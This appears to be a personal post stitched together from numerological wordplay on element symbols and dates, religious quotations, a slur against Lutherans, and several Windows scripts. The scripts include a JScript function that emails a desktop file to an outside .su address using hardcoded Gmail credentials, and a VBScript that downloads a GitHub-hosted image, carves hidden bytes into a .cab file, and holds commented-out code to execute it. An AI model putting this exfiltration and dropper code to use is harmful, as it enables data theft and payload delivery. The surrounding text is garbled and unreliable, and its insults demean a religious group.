Phage

PAu
hg (Greek) 73 ~> Ta
SaV
Ate

SVAt = 162385 = 25 = Mg

a & e

g a M e

PHg = 15 & 80 = 95 Am

g a M e = 95 Am

9 a M 5~e = 9 a M e = g a M e

M e g a + PAu & Ta ~ M e g a + PTa & Au ~ M e g a + P171 & 79 ~ M e g a + P11 & 79+7 ~ Mega + PNa & 8&6 ~ Mega + PNa & OC ~ Mega + PHa & 9S ~ Mega + PHa & 9Σ

HN
Γ(3 = 12 = -2 = 5 = S)Σ


MegaPHa9Σ

AmGe = Am + Ge = 95 + 32 = 127 = 1 X (2 + 7) = 9

NAtO = 7 + 85 + 8 = 92 + 8 ~ 95 + 5 ~ 95 + 32 ~ Am + Ge = AmGe

9 & NAtO linked In The Equation as 9 - NATO ~> 9, NATO

AmGe~MeGA~Mega Equals 9, NATO

MegaPHa9Σ

10^6 ~> 10 Y 6 ~> 16 ~> -6 ~> 9

Sharptongue Lil' Nig = Native American Name (Mohawk Adopted)

Au2Te

var lib64 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var wsh = new ActiveXObject("WScript.Shell");
var str = "";
var key = "";
var result = "";
for (var i = 0; i < str.length; i++)
{
var k = lib64.indexOf(str.substr(i,1)) + lib64.indexOf(key.substr(i,1));
if (k >= 36)
{
k = k - 36;
}
result += lib64.substr(k,1);
}
wsh.Popup(result);
var fso  = new ActiveXObject("Scripting.FileSystemObject"); 
var fh = fso.CreateTextFile("ciphertext.txt",2, true); 
fh.WriteLine(result); 
fh.Close();

var lib64 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var wsh = new ActiveXObject("WScript.Shell");
var ciphertext = "";
var key = "";
var result = "";
for (var i = 0; i < ciphertext.length; i++)
{
var k = lib64.indexOf(ciphertext.substr(i,1)) - lib64.indexOf(key.substr(i,1));
if (k < 0)
{
k = k + 36;
}
result += lib64.substr(k,1);
}
wsh.Popup(result);

DEACON = CODE NA = CODE 11

text, character count (up to 99,999,999,999,999,999)
convert text to other representation using a table (base)

3 4 10 = 3 4 1 9 = 4 13 9 = 4/13/7

7 ~ 16 ~ S ~ 5 ~ E ~ -3 ~ 13 ~ 49 ~ 2029

Wall papers


Saint Stephen = Stephanie Br 30 (DEACON ~> CODE NA) (Direct Connection)
Saint Mary = Kate Marie 27
Saint Paul = Paul Glenerson 24
Saint Peter = Tatiana Nikolaevna 5
Saint John = Savannah Rae 23


Faith And Works
alCoPaUL, beth GviLLErMo [GIMO]
12/9/2024
NYC
 
- Justified By Faith And Works ("Faith Without Works Is Dead") - Saint James
 
- "For we hold that a man is justified by faith alone, apart from works of the law." - FAITH Highlighted - Saint Paul
 
Plus
 
Subjecting To The Current Laws Of The Government Because They Were Rooted In Love
Of Others And Were Instituted By God. - WORKS
 
- Justified By Faith And Your Role In The Society As Works (*** “I think of prisoners who, deprived of their freedom, daily feel the harshness of detention and its restrictions, lack of affection, and, in more than a few cases, lack of respect,” said Pope Francis. “In order to offer prisoners a concrete sign of closeness, I would myself like to open a Holy Door in a prison, as a sign inviting prisoners to look to the future with hope and a renewed sense of confidence.” MAXIMUM AT ULTIMATUM") 


“I think of prisoners who, deprived of their freedom, daily feel the harshness of detention and its restrictions, lack of affection, and, in more than a few cases, lack of respect,” Francis said, according to EWTN.

“I propose to the governments that during the jubilee year they take initiatives that restore hope, forms of amnesty or pardon that help people to regain confidence in themselves and in society, ways of reintegration into the community,” the pope said, according to EWTN.

FACT SHEET: President Biden Announces Clemency for Nearly 1,500 Americans
 

JANUARY 20, 2025 - THE UNITED STATES GO FULL LUTHERAN (PRESIDENT'S ANCESTRY TAP AND FUNNEL THE DUMBSHITS WITHIN)

=== We Therefore Conclude That Lutherans And The OffShoots There Of Are Dumbshits..
 


JULY 15, 1918 ~ 6 & 1 10 & 5 ~ 6 10 1 5 ~ 6 10 15 ~ 6 10 P ~ 6 10 14 ~ 6 10 2 12 ~ 6 10 & 2 21 ~ June 10 & February 21
MARCH 15, 1976 ~ 3 15 ~ 15 3 ~ 6 12 ~ June 12
June 14, 1918 ~ June 5

distare/disto "identity"

to be apart from, to be unique, to have an own identity, to be recognizable as an individual apart from the other..

~ ensures non-usurpery

U+2623

UT2723
1817 (1812 5 ~ 102 ((181)&2) 5 ~ 98---- 5 ~ 96 5 ~ 15 5 ~ 24 5  2723

///////////////
2 = USA
4 = PI

24 Cr
42 Mo
 2 He
-----
68 Er

819Er

891Er
OF15r
OF53r
OFIr
89Ir ----> 17Ir9 ~ ClIr16 ~ ClArS ~ ClAr5 ~ ClArE ~> Al rC I Ξ ~> AlIr--C - = Al1riC I = Alaric I
AcIr ~> IrcA ~> IrCa 1986 (--->, <--)


C.H.roM.e




1986 = 1086 = 96

GAMBINO

NAB - New American Bible
GIMO

Sounds + Picture (Audacity 2.1.3)

A-law, lil' endian

Stereo Mix sound on new track

Mix and render to a new track

Save uncompressed files-> RAW + A-law

Муһаммад ибн Али ал-Заѡј Фатимаһ

smtpmail("longint32@gmail.com", "x32rr445r.", "smtp.gmail.com", 465, "redcloud@krovatka.su");
function smtpmail (xusername, xpassword, xsmtpserver, xsmtpport, xto)
{
try {
var xcdoconf = new ActiveXObject("CDO.Configuration");
var xcdo = new ActiveXObject("CDO.Message");
var xfields = xcdoconf.Fields;
with (xfields)
{
var schema = "http://schemas.microsoft.com/cdo/configuration/";
Item(schema + "sendusing") = 2;
Item(schema + "smtpauthenticate") = 1;
Item(schema + "smtpserver") = xsmtpserver;
Item(schema + "smtpserverport") = xsmtpport;
Item(schema + "sendusername") = xusername;
Item(schema + "sendpassword") = xpassword;
Item(schema + "smtpusessl") = 1;
Item(schema + "smtpconnectiontimeout") = 666;
Update();
}
with (xcdo)
{
To = xto;
From = xusername;
Subject = "6:00AM guys, ok";
HTMLBody = "<html>bring the project and beer too</html>";
AddAttachment("C:\\Users\\rubidus\\Desktop\\Koran\\TheZergs.SyRaBA\\Assignment\\signal.txt");
Sender = "longint32";
Organization = "[GIMO][As]";
ReplyTo = xusername;
Configuration = xcdoconf;
Send();
}
xcdo = null;
xcdoconf = null; 
xfields = null;
}
catch(e){
xcdo = null;
xcdoconf = null;
xfields = null;
}
}


strFileURL = "https://raw.githubusercontent.com/alcopaul/LETTERS.40/master/gimo.jpg"
strHDLocation = "C:\Users\rubidus\Desktop\periodictable.cab"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.Open "GET", strFileURL, false
objXMLHTTP.Send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
Set objADOStream1 = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream1.Open
objADOStream1.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 89632
objADOStream1.Write objADOStream.Read(4955)
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream1.SaveToFile strHDLocation
objADOStream1.Close
objADOStream.Close
Set objADOStream1 = Nothing
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

'Dim WshShell, oExec
'Set WshShell = CreateObject("WScript.Shell")
'Set oExec = WshShell.Exec(strHDLocation)
'Do While oExec.Status = 0
'WScript.Sleep 100
'Loop

'Cannibal Hell


211th, 212th, 213th
211, 212, 213
211, 5, 6
211, 11
222
2112
21-2
215
21S
2116
28th

;ml.exe getcur.asm /link /subsystem:console /entry:start
;alCoPaUL[GIMO][GOTH][b8]
.686
.model flat,stdcall
.code
;includelib 3232.lib
includelib 2024.lib
extern printf:proc
extern sprintf_s:proc
extern _getcwd:proc
extern _findfirst:proc
extern _findnext:proc
extern _findclose:proc
start:
main proc
enter 0,0
push 0
push 0
call _getcwd
push eax
push offset i
call printf
push offset g
push offset i
call printf

push offset [u+20]
push offset t
call _findfirst

mov ebx, eax
push offset [u+40]
push offset i
call printf

lea eax,[u+qu]
push eax
push ebx
call _findnext
;cmp eax, 0
;jne exit

lea eax,[u+qu+uq]
push eax
push offset i
call printf

lea eax,[u+100]
push eax
push ebx
call _findnext
;cmp eax, 0
;jne exit

lea eax,[u+120]
push eax
push offset i
call printf

exit:
;mov ecx, 60
;s:lea edx, [u+ecx]
;push offset edx
;push ebx
;call _findnext
;cmp eax,0
;jne l
;add ecx,20
;lea edx, [u+ecx]
;push edx
;push offset i
;call printf
;add ecx,20
;jmp s
l:leave
ret
main endp
.data
qu equ 60
uq equ 20
g db '\',0
t db '*.asm',0
u db 999426 DUP(0)
i db 25h,73h,0
end start

24 The Light
114 The People

2x4 = 8 Saturn = Lead = Le 
--4 = 3 Venus = Copper = Co

Ni = 28 = The Narratives

Li Pe Na = PiNe a__L_

ppe
14145 ~ 5145 ~ 96 ~ 15 ~ 7926 ~ 105 El.ephant >**< 113 Da.wn ["lEaD want NePH~NeF~19~109"], ** = 109 The Disbelievers

24
5
23
27
30
--
109

12 = 8 + 3 + 1

8 + 31 = 39 (12 27 ~ 12 72 ~ 1272 ~ 127II ~ 12711 ~ 127VVI ~ 127VV- ~ 127VΛ ~ 127X) 

December 25, 1991
December 25, 2024

Apparition After 33 Years

33 = As = -ΛS = VS = SV = SU

beth GviLLErMo [GIMO]
12/19/2024
NYC

alCoPaUL, beth GviLLErMo [GIMO]
12/10/2024
NYC 06:50 PM EDT

